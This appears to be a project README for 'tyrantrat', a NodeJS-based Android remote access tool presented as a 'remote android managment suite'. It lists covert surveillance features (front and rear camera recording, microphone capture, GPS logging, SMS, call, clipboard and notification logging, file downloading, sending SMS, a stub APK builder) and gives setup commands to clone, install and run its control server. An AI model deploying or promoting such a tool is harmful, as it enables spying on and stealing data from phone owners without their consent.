A cloud based remote android managment suite, powered by NodeJS
- Screenshot Capture
- Screen Recorder
- Rear Camera Recorder
- Front Camera Recorder
- Lock Device
- GPS Logging
- Microphone Recording
- View Contacts
- SMS Logs
- Send SMS
- Call Logs
- View Installed Apps
- View Stub Permissions
- Live Clipboard Logging
- Live Notification Logging
- View WiFi Networks (logs previously seen)
- File Explorer & Downloader
- Command Queuing
- Built In APK Builder
- Call Blocker
-
Install NodeJs
apt install nodejs
-
Clone
git clone https://github.com/shaktibiplabDev/tyrantrat.git
-
Goto server directory
cd tyrantrat/server
-
Install all dependencies
npm install
-
Make a separate directory where tyrantrat app will be save
mkdir ~/tyrantrat
-
Run server
node index.js
-
In your browser navigate to
http://<SERVER IP>:22533
& Login with default username and password ( By default server will run on localhost )